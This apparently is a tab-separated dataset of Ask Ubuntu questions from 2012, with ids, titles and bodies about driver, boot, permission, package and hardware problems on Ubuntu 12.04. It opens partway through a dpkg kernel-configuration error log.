on linux-image-3.2.0-26-generic ; however : package linux-image-3.2.0-26-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.26.28 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up cron ( 3.0pl1-120ubuntu4 ) ... installing new version of config file /etc/default/cron ... cron start/running , process 1768 setting up libdbusmenu-glib4 ( 0.6.2-0ubuntu0.1 ) ... setting up libdbusmenu-gtk4 ( 0.6.2-0ubuntu0.1 ) ... setting up gir1.2-dbusmenu-glib-0.4 ( 0.6.2-0ubuntu0.1 ) ... setting up gir1.2-dbusmenu-gtk-0.4 ( 0.6.2-0ubuntu0.1 ) ... setting up libdbusmenu-gtk3-4 ( 0.6.2-0ubuntu0.1 ) ... setting up libmtp-common ( 1.1.3-1ubuntu0.1 ) ... setting up libmtp9 ( 1.1.3-1ubuntu0.1 ) ... setting up libmtp-runtime ( 1.1.3-1ubuntu0.1 ) ... setting up libxkbfile1 ( 1:1.0.7-1ubuntu0.1 ) ... setting up desktop-file-utils ( 0.20-0ubuntu3 ) ... configuration file `/etc/gnome/defaults.list' == > modified ( by you or by a script ) since installation . == > package distributor has shipped an updated version . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . *** defaults.list ( y/i/n/o/d/z ) [ default=n ] ? y installing new version of config file /etc/gnome/defaults.list ... setting up empathy-common ( 3.4.2.1-0ubuntu1 ) ... setting up nautilus-sendto-empathy ( 3.4.2.1-0ubuntu1 ) ... setting up empathy ( 3.4.2.1-0ubuntu1 ) ... setting up kate-data ( 4:4.8.4-0ubuntu0.1 ) ... setting up libkdecore5 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkdeui5 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkdeclarative5 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libnepomuk4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libnepomuksync4 ( 4:4.8.4-0ubuntu0.1 ) ... setting up libkcmutils4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkpty4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkdesu5 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libsolid4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkio5 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libnepomukquery4a ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libnepomukutils4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkparts4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkdewebkit5 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkdnssd4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkemoticons4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkfile4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkjsapi4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libktexteditor4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkhtml5 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkidletime4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkmediaplayer4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libknewstuff3-4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libknotifyconfig4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libnepomukdatamanagement4 ( 4:4.8.4-0ubuntu0.1 ) ... setting up libthreadweaver4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libplasma3 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up kde-runtime-data ( 4:4.8.4-0ubuntu0.1 ) ... setting up libkde3support4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkjsembed4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkntlm4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkrosscore4 ( 4:4.8.4a-0ubuntu0.1 ) ... setting up kdelibs5-data ( 4:4.8.4a-0ubuntu0.1 ) ... setting up kdoctools ( 4:4.8.4a-0ubuntu0.1 ) ... setting up kdelibs-bin ( 4:4.8.4a-0ubuntu0.1 ) ... setting up libkatepartinterfaces4 ( 4:4.8.4-0ubuntu0.1 ) ... setting up katepart ( 4:4.8.4-0ubuntu0.1 ) ... setting up kdelibs5-plugins ( 4:4.8.4a-0ubuntu0.1 ) ... setting up plasma-scriptengine-javascript ( 4:4.8.4-0ubuntu0.1 ) ... setting up kde-runtime ( 4:4.8.4-0ubuntu0.1 ) ... setting up xserver-common ( 2:1.11.4-0ubuntu10.3 ) ... setting up xserver-xorg-core ( 2:1.11.4-0ubuntu10.3 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : linux-image-3.2.0-26-generic linux-image-generic linux-generic error in function : setting up linux-image-3.2.0-26-generic ( 3.2.0-26.41 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic update-initramfs : generating /boot/initrd.img-3.2.0-26-generic warning : no support for locale : en_us.utf8 run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic /usr/sbin/grub-mkconfig : 33 : /etc/default/grub : tmpfs : not found run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-26-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-26-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-26-generic ; however : package linux-image-3.2.0-26-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.26.28 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured
159745	meaning of the free space indication in deluge	recently i installed ubuntu 12.0.4 using wubi with my current windows vista . i have already installed all the 265 updates from the ubuntu software center and downloaded deluge from there . my hardrive is 80gb according to the disc usage analyzer . it also says 31.2 gb used and 47.8gb free . the confusion comes when i run deluge . at the bottom it says 2.0gb free space . is that 2.0gb just a size set from the torrent client and can be changed or am i limited to just that 2.0gb ?
159749	will i loose my data from windows if i import my account to ubuntu 12.04	i 'm installing ubuntu 12.04 lts , and right now it 's importing my only account from windows 7 . i 'm wondering : is it just copying and pasting my account , or is it removing my account from windows completely , so it will only be in ubuntu ?
159755	can i install ubuntu server alongside windows ?	i am wondering if its possible to install ubuntu server side by side with windows , and i do n't want it to touch it . is possible , i know it is on the desktop version but not sure for the server . the version is the one currently downloaded as of today the july 4 2012 thanks .
159762	how to use media buttons for mplayer ?	how can i use my laptop 's media buttons [ play/pause , next , previous ] to work with mplayer ? the xf86 buttons i think they 're called .
159763	playback on mythbuntu with nvidia graphic adapter is showing moderate tearing , and does n't cover unity	since upgrading to mythbunu 12.04 and mythtv 0.25 , my playback has been showing tearing and also the unity top panel plus the unity launcher overlay the screen . is there a way to fix this ?
159765	nvidia problems . i think .	let me start off by saying , i 've been trying to run ubuntu on my custom pc for about 2 years . from 10.04 to 12.04 , this problem persists . when i try to boot ubuntu from either a usb stick or a cd , i see the normal ubuntu splash screen . it looks like it 's working , orange dots are moving , but then the screen glitches and freezes . i 'm assuming this happens because there are no drivers for my graphics card ( nvidia geforce 8800 , i think ) . my motherboard has no onboard graphics , nor does it have a vga out . so , how can i get this working on my system ? can i somehow put the drivers along side the .img on the usb stick ? i can boot from my ubuntu usb stick on my macbook . in case that helps anyone ...
159767	the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect	i have recently installed ubuntu 12.04 in a intel ivy bridge with integrated graphics and nvidia gpu with optimus tech , however i cant manage it to work properly . i have already passed by the solution of bumblebee project , however iam got the following message when try to run anything with nvidia card ( e.g . with optirun firefox ) : [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ error ] could not connect to bumblebee daemon - is it running ? since the nvidia card is not working properly , some softwares like scilab , that make use of x11 system for graphic handling and plotting , wont work too . my bios has no option concerning graphics card and the log of daemon returned : jul 5 16:10:51 humannoise-w251esq-w270esq bumblebeed [ 980 ] : module 'nvidia ' is not found . jul 5 16:10:51 humannoise-w251esq-w270esq kernel : [ 17.943272 ] init : bumblebeed main process ( 980 ) terminated with status 1 jul 5 16:10:51 humannoise-w251esq-w270esq kernel : [ 17.943288 ] init : bumblebeed main process ended , respawning jul 5 16:10:51 humannoise-w251esq-w270esq bumblebeed [ 1026 ] : module 'nvidia ' is not found . the lspci -nn | grep '\ [ 030 [ 02 ] \ ] : ' returned : 00:02.0 vga compatible controller [ 0300 ] : intel corporation ivy bridge graphics controller [ 8086:0166 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:0de9 ] ( rev a1 ) ok , for the command dpkg -l | grep '^ii ' | grep nvidia i got : ii bumblebee-nvidia 3.0-2~preciseppa1 nvidia optimus support using the proprietary nvidia driver ii nvidia-current 302.17-0ubuntu1~precise~xup1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current-updates 295.49-0ubuntu0.1 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings 302.17-0ubuntu1~precise~xup3 tool of configuring the nvidia graphics driver ii nvidia-settings-updates 295.33-0ubuntu1 tool of configuring the nvidia graphics driver after full reinstallation , including the remove of any previous nvidia drive , lsmod | grep -e 'nvidia|nouveau ' returned : nvidia 10888310 46 dmesg | grep -c3 -e 'nouveau|nvrm ' returned things like : [ 1875.607283 ] nvidia 0000:01:00.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1875.607289 ] nvidia 0000:01:00.0 : setting latency timer to 64 [ 1875.607293 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=none [ 1875.607363 ] nvrm : loading nvidia unix x86_64 kernel module 302.17 tue jun 12 16:03:22 pdt 2012 [ 1884.830035 ] nvidia 0000:01:00.0 : pci int a disabled [ 1884.832058 ] bbswitch : disabling discrete graphics [ 1884.832960 ] bbswitch : result of optimus _dsm call : 09000019 some programs , like scilab , are now working fine under optirun ( e.g . > optirun scilab ) call .
159768	dual displays not working - nvidia - ubuntu 12.04 - second monitor - two screens	graphics card : nvidia 460 gtx . driver : nvidia accelerated graphics driver ( version current ) i have one dvi monitor , an old dell lcd from 2005 , and one vga monitor , an asus ml238h from 2010 whose hdmi port broke . the asus is plugged into my graphics card 's primary monitor slot and is the better monitor even though it is vga but my computer defaults to the dell . this happens when i boot as well ; the loading screens , the motherboard brand image , etc . are all displayed on the dell monitor until windows loads . then both monitors work . the same thing happened when i booted up ubuntu 12.04 but i did not see the second monitor when the log-in screen popped up , nor did i when i logged in . i went to system settings/displays and my asus monitor is not an option . i clicked detect displays and the asus is not detected . i looked at the other questions regarding nvidia drivers and recalled my problems with ubuntu a few years ago and decided to check the driver . i went to additional drivers to install the proprietary driver and it looks like it 's installed and active but i 'm still having this problem . there is another driver option , the post-release nvidia driver , but that does not fix the problem either . also , under system details/graphics the graphics device is listed as unknown , which might indicate that it is using an open source generic driver and not the proprietary nvidia driver . but under additional drivers it says that i am using the nvidia driver . any help is appreciated .
159776	no keyboard after suspend , even after hard reset	while i was using a ubuntu 9.1 live cd , i put the computer ( toshiba satellite c655 ) into standby . after i resumed , the keyboard stopped functioning , though the mouse ( usb ) still worked . i decided to turn off the computer , but after ubuntu shuts down , it asks you to press `` enter '' to actually turn the machine off . the keyboard was still dead , so i all i could do was use the on/off switch to power down the computer . now , when i try to boot the computer , nothing happens . before this problem , i would see a menu asking me to select an os ( i had windows 7 and windows xp installed ) . i can not use any emergency measures because i need to press f12 to boot from a cd , and the keyboard is still not working . i tried removing the hd to force a boot from the cd , but it did n't work . i also tried to plug in a usb keyboard , which failed as well . right now , i have no idea how to fix this . any ideas ?
159782	usb devices unacessible	i have a funny thing happening with my usb devices . they are detected and show up as they should but i can not write to them , i can read the files in them . i can not change the group folder access . it keeps reverting to none when i try change it . however when i start a guest session and copy a screen shot to the usb i can , but can not in my regular administration session . why can not i change the option and why does it behave properly in a guest session but not normally ? anyone know how to help me out here ? i am using ubuntu 12.04 , 32-bit .
159783	how do i find out if i have a swap partition on my hard drive ?	i used the 12.04 live cd to install ubuntu over my windows 7 partition and deleted everything so i just have ubuntu on my laptop . but since during the installer i chose the simple `` erase entire disk '' option , did the installer create a swap partition or is that something i should 've done with the `` something else '' option ? btw i have 6gb of ram
159794	fix for poor hd playback using ati or nvidia graphics	hi all i was wondering if any one had a fix for the poor hd playback of ubuntu i see many questions on here and google but no one seems to know .
159798	12.04 lts boot hangs at `` sp5100 tco timer : mmio address 0xfec000f0 already in use '' , did n't yesterday	dual-booting windows 7 and ubuntu 12.04 lts . i went to reboot from win to ubu , and found a few interesting things . my post screen is covered in blocks of epileptic colors until i hit grub , which continues when i try to boot into ubuntu . these color blocks do n't appear when i use my on-board vga , so i 'll just attribute to that . grub dimensions are swapped ( card vs onboard , probably ) , but , when interfacing with onboard vga , the grub timeout counter works and when using my card , it does not ( see `` [ ! ! ! ] '' below for more information ) booting into ubuntu directly causes the error : sp5100 tco timer : mmio address 0xfec000f0 already in use booting into recovery mode , meanwhile , and then `` resuming normal boot '' gets me to the desktop without native 1440x900 resolution and graphic drivers ca n't tell the monitor it 's looking at ( i assume this is because it 's not a full graphic boot , and as it says , some drivers wo n't run ? ) [ ! ! ! ] when i reboot after going into recovery mode , the countdown timer works once , puts me back into default ubuntu boot , and then does not work again until after another recovery-mode boot . windows 7 can boot perfectly with no issues whatsoever from epilepsy color blocks or driver detection . this makes me wonder /why/ the post screen ca n't handle my video card anymore . amidst all the diagnostics , i opened my case and re-seated the videocard securely , ensuring it was n't a loose connection -- but this did nothing to help me . hardware i am running an nvidia geforce gtx 8800 video card in a pci slot . i have 4.8gib memory , an amd athlon ii quad-core 640 processor , on an msi k9n6gm series mobo . onboard video is an nvidia geforce mcp61 ( v/s/p ) card . note : i did not have any of these problems yesterday , and i have been using ubuntu intensively for a week , though it 's been working flawlessly for months . i 've recently been using it to mod my android phone , perhaps i messed something up in the file system ?
159802	how can i select a sample of pictures from a camera import and move them to another folder on my system	shotwell imports the pictures into the pictures directory but the displayed thumbprints it maps to its own virtual library structure . it does n't seem to offer much in the way of selecting collections of photos and moving them around the file system . is there a way to do this with or without shotwell ? please help .
159804	12.04 run from cd , can not copy files from mounted disk	i am running 12.04 live from cd and trying to copy some important files from a mounted hard disk to an external disk . ( my previous installation of 10.04 crashed and i want to install 12.04 , and back up some data before that ) . when i try to copy files from the mounted disk to the external one , i get the following error : there was an error copying the file into /media/new volume/l300_bkp_2012_06_04/pics error opening file : permission denied is this related to the source ( mounted hard disk ) or the target ( external disk ) ? how do i get around this ?
159805	how do i use the discoverer module with pygi gstpbutils ?	i 'm trying to port some pygtk music player code to pygi which uses gst 's discoverer module . from gi.repository import gst , gstpbutils def on_discovered ( discoverer , ismedia ) : print ( `` % s -- % s '' % ( discoverer.tags.get ( 'title ' , 'unknown ' ) , discoverer.tags.get ( 'artist ' , 'unknown ' ) ) ) gst.init ( none ) location = `` file : ///srv/music/molly_hatchet-the_creeper.mp3 '' discoverer = gstpbutils.discoverer ( ) discoverer.discover_uri ( location ) discoverer.connect ( 'discovered ' , on_discovered ) when i attempt to run this i get the following error : /usr/lib/python2.7/dist-packages/gi/types.py:43 : warning : g_object_get_qdata : assertion `g_is_object ( object ) ' failed return info.invoke ( *args , **kwargs ) /usr/lib/python2.7/dist-packages/gi/types.py:43 : warning : g_object_ref_sink : assertion `g_is_object ( object ) ' failed return info.invoke ( *args , **kwargs ) ** ( python:21482 ) : critical ** : pygobject_register_wrapper : assertion `pyobject_typecheck ( self , & pygobject_type ) ' failed /usr/lib/python2.7/dist-packages/gi/types.py:43 : warning : g_object_unref : assertion `g_is_object ( object ) ' failed return info.invoke ( *args , **kwargs ) unfortunately documentation on this pygi module seems a bit sparse . for now i 've reverted back to pygtk , but i 'd love to know how to make this work with pygi since that 's going to be the way forward with ubuntu .
159812	network manager indicator missing	i recently upgraded from 11.10 to 12.04 . my first attempt failed , and i received an error stating that not all of the required packages were downloaded . before ( successfully ) attempting again , i noticed that there was no longer a networking indicator in the upper panel . the indicator did not reappear with the installation of 12.04 . to be clear , my wireless connection has experienced no problems , despite the missing indicator . here are the solutions that i have found which did not work for me : editing /etc/networkmanager/networkmanager.conf and replacing [ ifupdown ] managed=false with =true . reinstalling network-manager ( via apt-get install -- reinstall ) . i am currently running 12.04 on an asus eee pc 1005 ha , and i am new to seeking solutions through forums , so i apologize if i have neglected to provide some vital information about my hardware .
159818	why is ssh not accessible after installing kde on ubuntu server ?	i installed kde onto my ubuntu server , which is operating as a file server . it installed a firewall that was n't there previously . i ca n't reach any of the services i had operating on the box now , ssh in particular . i can access them all locally . i 've checked iptables and ufw , both are stopped and disabled . is there another firewall i should be looking at ?
159819	why is my fresh install of 12.04 running slow ?	hey guys i 'm a new linux user , i figured it would be the best for the laptop i just purchased because it 's said to be faster than windows 7 . i 'm currently dual-booting with windows 7 professial and ubuntu 12.04 . the laptop i am using is the lg x note p210 specs : intel core i5 470um dual core clocked at 1.33ghz 12.5 '' hd led lcd screen at 1366 by 768 4gb ddr3 @ 1333 mhz ram integrated intel hd graphics card 4 cell battery with 3150mah it comes loaded windows 7 home premium 64-bit , it runs fine on that but my ubuntu 12.04 runs slower than it and i do n't understand why , it definitely has decent specs to run even a 64-bit operating system and do some gaming . granted i know it 's not the best but for a laptop it does the job so ubuntu should work especially since it 's said to make older units with worse specs run even better . i 'm not all that familiar with coding and all so what are things i can do to optimize speed without overclocking ? boot up is fine , its program response time i believe , once im in the actual os , it lags , slows down , apps stop working , take forever to load up apps .
159820	where are logs stored ?	afaik applications in ubuntu track activity and errors beyond what is covered by the `` privacy '' setting . ( including , for example , login/logout/shutdown times . ) where are these logs stored ?
159822	unable to uninstall applications via ubuntu software centre	i am running ubuntu 10.04 recently i tried to uninstall apps from ubuntu software centre , but it shows the app is uninstalled , but with some error . when i check the application from app menu , it shows the icon , but upon clicking it shows error . i want to get rid of this . please help me fix the problem . installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 309049 files and directories currently installed . ) removing prism-google-talk ... removing prism ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory rebuilding /usr/share/applications/desktop.en_in.iso8859-1.cache ... warning : system locale is invalid processing triggers for gnome-icon-theme ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' unknown media type in type 'interface/x-winamp-skin' processing triggers for python-support ... setting up bandwidthd ( 2.0.1 ) ... update-rc.d : warning : /etc/init.d/bandwidthd missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` start '' failed . dpkg : error processing bandwidthd ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : bandwidthd setting up bandwidthd ( 2.0.1 ) ... update-rc.d : warning : /etc/init.d/bandwidthd missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` start '' failed . dpkg : error processing bandwidthd ( -- configure ) : subprocess installed post-installation script returned error exit status 2
159824	howto automatically remove older package versions from a custom repository ?	i want to create a private repository for ubuntu . i executed the command dpkg-scanpackages . /dev/null | gzip -9c > packages.gz and successfully created my repository . after a few days , i updated my ubuntu and put the downloaded archives from /var/cache/apt to my personal repository . again i executed the above command to update my repository , but it shown some issues with versions ( multiple versions for same program ) . i tried with -m switch to allow multiple versions , and it was successfully created the repository . my questions is , can i automatically remove the older versions from my personal ubuntu repository ( it could save my disk space )
159825	how to start a program at a scheduled time if i am logged in ?	i want the following behaviour : if i am logged in , and it is a certain time , and the program is n't already started , start the program . how can i achieve this ?
159826	partition listed as read-only but is n't !	i have a 2gb external drive which it appears nautilus thinks is read-only ; but it is n't ! basically i can not add files and folders by right-clicking . i have tried restarting and it does n't help . i can open a terminal and go to the folder and it works fine to use the mkdir command ( without sudo ) and i am also the owner . right-clicking shows that i am the owner of the folder and that i have read/write access to folders . i can save documents from gedit to it , for example . using ubuntu 12.04 . anyone know what 's going on here ?
159829	what to do if disk utility shows bad sectors pending in smart ?	i have 12.04 32bit installed on my hard drive . ubuntu is the only os . i recently installed it after getting rid of windows 7 . when i run disk utility under smart status it says `` disk has a few bad sectors '' , so i clicked on view smart data and run self tests . i run the extended smart self-test and it only takes 5-10 seconds for it to stop and reads self-tests : failed ( read ) , bad sectors : 1 bad sector , overall disk assessment : disk has a few bad sectors . is this something i should be worried about ?
159831	how to install honeyd in ubuntu ?	i am using ubuntu 12.04 in vmware . i have to test the working of honeyd . suggest me the exact step by step installation process of honeyd in ubuntu .
159833	how do i get the kernel source code ?	i am planning to write some device drivers and i need to get the linux kernel source . my linux kernel version is 3.2.0-23-generic-pae and i downloaded the image from this . in many of the articles i have read , it tells me that i need to have the entire kernel tree to start inserting new modules . is it enough if i download this image and paste it into the usr/src/ folder or do i have to do something else ?
159836	unable to start ubuntu 12.04 . the system is running in low-graphics	i am a newbie to ubuntu . i installed ubuntu 12.04 using a usb stick and it was running all fine for a few weeks and this error popped up . according to one of my friend , the best way was to re-install ubuntu . being from a non unix background i thought the same too and after the second install it happened again , but only this time was much quicker , in 3 days . i do n't want to re-install ubuntu every time this happens . i am a complete newbie to linux which means that i am really bad at using terminal . i know there are other people who fixed this issue using this very same forum , but unfortunately the answers provided are too complex for me to understand . please let me know how to do this . things i want to let you know : i would need help step by step if that is alright with you . after i get the error i get the options and i click exit to console login i get the following message in a black screen ( which i think is a command line sort of thing ) : * stopping save kernel messages [ ok ] apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername [ ok ] * starting web server apache2 and a blinking cursor . so basically it looks like a dead end for my non unixy eye . and one final thing is before this issue had happened i had tried configuring python to apache2 . for that i had uninstalled and installed lamp server several time and edited the configuration files too . i do n't know if this really is a concern , but i do n't know.. i have a usb with ubuntu 12.04 in it so i can install it anytime . ( but i want to know what the issue is rather than running away ) . i migrated to ubuntu from windows and i have no plans to go back . i think that 's from my side . please let me know if there are any questions .
159841	my intel hd 3000 + core i3 processor is performing really bad	i 've used ubuntu before on my old laptop , sporitng an amd v-series cpu and a mobile radeon 4250 , both really bad compared to my laptop now . however , with ubuntu on both computers , my old laptop definetely knocks my intel i3 laptop out of the park . the graphics are slow and sluggish , and my mouse pointer feels a bit lagged . can anyone help me ? ? ?
159844	when will packages uploaded to ppa by dput available ?	dput completed successfully , but refreshing the corresponding launchpad page does n't render a change , it still says `` no updates '' for this ppa , am i doing something wrong ?
159846	tried to boot ubuntu , but the grub rescue shows up instead	tried to boot ubuntu , but something like this shows up instead :
159847	creating a bootable flash without overlayfs	i want to create an usb stick to carry my ubuntu everywhere around with me . it 's not intended to spread ubuntu by installing it everywhere , but rather for running my configured system on any computer i come across . so far , i went with installing ubuntu with unetbootin , however , i have some issues with this . when installed with netbootin , the original disk image is kept intact on the flash drive , forever . also , a file is created for persistent storage and during boot it is accessed together with the image by overlayfs . this , in my opinion , has the following problems : if system is updated regularly , then files from the image are overwritten in persistent storage , doubling their size and wasting precious space . persistent storage has a fixed size that you have to define from the start , again , wasting precious space . i 'm not 100 % sure , but maybe using overlayfs makes disk access slower , and more so on the relatively slow devices . so i 'd like to find another solution : either to get rid of the original image or to install ubuntu `` normally '' on the separate ext2 partition , or maybe even install it in the main vfat partition on the usb stick . suggestions ?
159853	why ca n't i mkdir ?	it seems to me that i have the proper permissions , so why ca n't i create directories in my $ home directory ? dotancohen @ neptune : ~ $ whoami dotancohen dotancohen @ neptune : ~ $ pwd /home/dotancohen dotancohen @ neptune : ~ $ ls -l .. | grep dotancohen drwxr-xr-x 16 shelly shelly 4096 jul 2 15:02 dotancohen dotancohen @ neptune : ~ $ mkdir test mkdir : can not create directory `test ' : permission denied dotancohen @ neptune : ~ $
159854	universal usb installer does not recognize the iso file	i downloaded ubuntu desktop 12.04 lts 32-bit . used the universal usb installer , but it wouldnt recognize the file . it was a clean download and i 'm quite sure that its not damaged . any suggestion or any other software you 'd recommend ?
159857	function key on my acer laptop is always pressed	while typing normal keys i have to press fn ( function key ) as it seems that the function key is pressed all the time . what i have to do to make the function key off and it trigger only when i presses it . any help will be appreciated ! thanks
159863	ca n't get graphics to work on hp pavilion g6	i have this crappy hp pavilion g6 laptop ( no other choice , provided by office ) which is having troubles dealing with graphics ( ubuntu 12.04 lts ) . details of the machine : its having a ati radeon graphics card , and i feel it is the main culprit . i also had troubles installing it and only after following this link , i could install it . ( setting nomodeset in grub ) now startup works good , but many things related to graphics do n't . ( i installed cinnamon too , but it also does n't seem to work correctly ) i have all the updates applied . i am currently facing problems in starting android emulator to test my android apps . whenever i try to start the emulator , i get following error message : starting emulator for avd 'phone_41' x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 apart from this , many other graphic related things do not work ( window switcher in graphic mode , cinnamon ) if i head to settings > drivers i see two graphics drivers for the card being displayed : the post-release-updates do n't get installed and mess with the other one too ( the one which is showing that it requires a restart ) problems : graphic drivers ca n't be installed android emulator does n't start , throws the above errors ( maybe because of the graphics ) is it a known issue or is there any workaround for this ?
159864	open source or free antivirus software	can you kindly tell me regarding antivirus software , open source or free codes are safe or not ? if safe , how is it possible as there are so many antivirus companies , giving the same by taking a bit of money ?
159870	unable to re-install compizconfig-settings-manager	while attempting to fix a problem with compiz settings manager , i got an idea from someone to purge compiz - sudo apt-get purge compiz . the compiz core packages are still intact however , the gui compizconfig-settings-manager is deleted and missing from synaptic . if i try to install through terminal i get : the following packages have unmet dependencies : compizconfig-settings-manager : i386 : depends : python-compizconfig : i386 but it is not going to be installed depends : python-gtk2 : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages any suggestions or insight is appreciated .
159876	using my laptop with ubuntu for my xbox360	i recently installed ubuntu in my laptop so pretty new to this system . on my other laptop that has windows 7..i was able to use that laptop to connect to my xbox 360 live using the network bridge . how do i do that with this laptop that has ubuntu ?
159877	ubuntu 12.04 for asus eeepc 1225c	in some market , asus eeepc 1225c comes with ubuntu preloaded . see asus site - http : //www.asus.com/eee/eee_pc/eee_pc_1225c/ in india it comes with dos , i installed ubuntu 12.04 on it and it has issues with display and track-pad . any idea which ubuntu image is used and can be made available to install on 1225c ?
